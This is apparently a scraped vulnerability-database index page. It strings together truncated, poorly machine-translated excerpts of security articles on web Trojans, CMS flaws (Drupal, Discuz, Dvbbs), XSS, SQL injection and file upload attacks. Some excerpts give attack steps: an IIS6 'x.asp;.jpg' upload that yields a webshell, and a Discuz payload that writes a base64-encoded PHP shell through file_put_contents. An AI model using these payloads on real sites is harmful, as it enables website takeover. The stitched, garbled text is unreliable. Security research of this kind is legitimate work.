vulnerability database

Using IE Object Data vulnerability system to do a new Web page Trojan (figure) _ Vulnerability Research

The original hacker x file 8th, the copyright belongs to the magazine all. Using Internet Explorer Object Data Vulnerability system to make new Web Trojan. Lcx. This August 20, Microsoft unveiled an important vulnerability: the Internet Explorer Object Data remote execution vulnerability, with the highest severity rating. This is a good thing for the Web Trojan enthusiasts

Drupal 'browserid' Cross-Site Request Forgery Vulnerability and Security Bypass Vulnerability

Release date: Vulnerability version: 7.x-1.x Vulnerability description: Drupal is an open source CMS that can be used as a content management platform for a variety of websites. Drupal's BrowserID (Mozilla Persona) module has the Cross-Site Request Forgery Vulnerability and Security Bypass Vulnerability. Attackers can exploit these vulnerabilities to bypass security restr

Quick message book v10.09 official version Upload Vulnerability and Cookie Spoofing Vulnerability

Upload Vulnerability: Vulnerability page: /up/add.asp Method of exploits: add a vulnerability page address after the message book, for example, http://localhost/up/add.asp. Attackers can exploit the parsing vulnerability of iis6.0 to construct an image trojan named x.asp;.jpg. Upload directly. Obtain webshell. For webshell address: The default value is /up/previusfile/07020. (upload the large and small file

Feeling: Program vulnerability, business vulnerability how to produce

Vulnerabilities will always exist, not developer negligence, but some of the vulnerabilities of the situation is very special, it may be very few people, or only one of the 100,000 people will encounter, or think of this situation, or do so, completely in the developer's unexpected, resulting in a loophole.In the process, the business, this vulnerability is often encountered, not uncommon. This loophole is also a way for the discovery to profit, so se

Create users and OpenVAS vulnerability scan in the basic openvas vulnerability scan tutorial

How to create a user: OpenVAS Management Service. By default, OpenVAS creates only one user named admin and is an administrator user (with the highest permissions). If you want to log on to another client, you cannot access the client as an administrator. Otherwise, the server becomes messy and cannot be managed. Ther

An IFRAME injection vulnerability, also Microsoft's application["error" vulnerability

Recently, the school conducted a security grade assessment, I was called to say that I wrote a site there is an IFRAME injection vulnerability, the page is the error page. I then used Netsparker scan my website, I found the error page there is a loophole, I write the site, in order to easily know the current program error, wrote an error page, the code is as followsif (! IsPostBack) { div_error. InnerHtml = application["Error"]. ToSt

Dynamic Network dvbbs7.1 Forum privilege Elevation Vulnerability and prevention (figure) _ Vulnerability Research

In June on the black defense to see "dynamic network 7.1 loopholes found in the world," a paper, said admin_postings.asp file There is an injection vulnerability, but the prerequisite is to have the super owner or front desk administrator privileges. I think of the previous discovery of the 7.x version of the network has a foreground privilege elevation loophole, just can be combined to use. This foreground privilege elevation

Discuz3.2 vulnerability File Inclusion Vulnerability shell in the background

Discuz3.2 vulnerability File Inclusion Vulnerability shell in the background Because the topic was not created Static nameThis vulnerability is caused by any restrictions1. Global-> site information Website URL: Http://www.comsenz.com? Php file_put_contents ('0. php', base64_decode ('pd9wahagqgv2ywwojf9qt1nuw2fdktsgpz4 = ');?> 2. Tools> Update Cache

Yilong loan User Password Change Vulnerability (logical vulnerability not cracked)

On the official website of Yilong loan, there is a random user password change vulnerability when retrieving the password. Step 1: retrieve the password, click "Send verification code", enter the incorrect verification code, and capture the packet: Write down the error return

Analysis of Common PHP program vulnerability attacks and php program vulnerability attacks

Summary: PHP programs are not solid. With the widespread use of PHP, some hackers do not want to bother with PHP, and attacks by using PHP program vulnerabilities are one of them. In this section, we will analyze the security of PHP in terms of global variables, remote files, file uploads, library files, Session files

Implementation of login background with SQL injection vulnerability

Type: Reprint. Time: 2012-01-12. Work needs, have to take a good tutorial on the Web security related knowledge, so essays this article, right when summed up, there is no meaning. Reading this article, I assume that the reader has the experience of writing SQL statements, or can read SQL statements as early as in 02, foreign about the SQL injection

Web vulnerability principle (need to update this article every week)

attacks. Method: 1. The escape character is not properly filtered. When the user's input is not filtered for the escape character, this form of injection attack occurs and it is passed to an SQL statement. This causes the end user of the application to manipulate the statements on the database. For example, the following line of code demonstrates the vulnerability: statement := "SELECT * from users WHERE na

Use the QQ space storage XSS vulnerability with the CSRF vulnerability to hijack other website accounts (sensitive tag 403 interception can bypass \ 403 bypass)

1. All tests are from the fuzz test (all are determined based on the returned content. If any judgment error occurs, sorry) 2. The XSS output point is not filtered. However, if a sensitive tag keyword is entered, the Server Returns Error 403, but it

DeDeCMS is hacked every time !! DEDECMS vulnerability scan and dedecms vulnerability scan

On the basis of dedecms, a classified information platform was created in the form of plug-ins, resulting in continuous problems. Every time I go up and scan, a bunch of vulnerabilities and dangerous code are completely hacked. The reason is, 1) the openness of open-source programs allows everyone to read the source

[Reprinted] the virus exploits Microsoft's largest vulnerability raging, MS08-067 vulnerability memory patch Tool

Virus: "MS08-067 vulnerability Virus Variant B" is a hacker program that exploits Microsoft MS08-067 vulnerability to launch attacks. This program starts the attack thread to randomly generate an IP address and tries to launch an attack on this IP address. If the system does not have a MS08-067 patch, it may be attacked. After successful attack, a Trojan of 6767.exe will be downloaded, which will modify the

Parsing web File Operations Common Security Vulnerability (directory, file name Detection vulnerability) _php Tutorial

To do web development, we often do code walk-through, many times, we will check some core features, or often appear the logic of loopholes. Along with the technical team's growth, the crew technology matures. Common fool-type SQL injection vulnerabilities, and XSS vulnerabilities. will be less, but we will also find that some emerging hidden vulnerabilities occasionally emerge. These vulnerabilities are more from developers, to a function, common module function design is insufficient, left the

Dynamic Network Forum 8.2 Classic Injection Vulnerability exploit _ vulnerability

I. Purpose of the experiment: Understanding Dynamic Network Forum 8.2 principle. II. Experiment principle: Dynamic Network Forum user login process, filtering lax, resulting in injection, elevated permissions. The vulnerability exists in the login.asp of the source file. III. Experimental environment: This machine: 192.168.1.2. Target machine: 192.168.1.3. IV. Experiment steps: First, the normal registration login. 1, visit Address: http://192.168.1

Research on the latest vulnerability code _ Vulnerability in Internet EXPLORER6

Use the following code: This code allows you to hide the HTML code in front of the page, and you can only see the code that executes inside the JavaScript statement after you run it. And after refreshing, you can no longer see the source code of the site, and can use JavaScript to execute arbitrary code. The best time to hang a horse is to be missed. Test method: Save the above code for an HTML page. If you only see the above time, it will prove that your IE also has this

Web site Common Vulnerability Resolution: File Upload vulnerability

Any file Upload vulnerability File Upload Vulnerability (Upload Attack) is because the file Upload function implementation code does not strictly limit the user's uploaded file suffix and file type, resulting in allowing attackers to upload arbitrary php files to a directory that can be accessed through the Web, and to pass these files to the PHP interpreter. You can execute arbitrary PHP scripts on the re

Introduction to XSS Cross-site vulnerability

cross-site vulnerability other than a target. If we are going to infiltrate a site, we construct a Web page that has a cross-site vulnerability and then construct a cross-site statement that deceives the administrator of the target server by combining other technologies, such as social engineering, to open Types of XSS One is the storage type: that is, the code is written to the
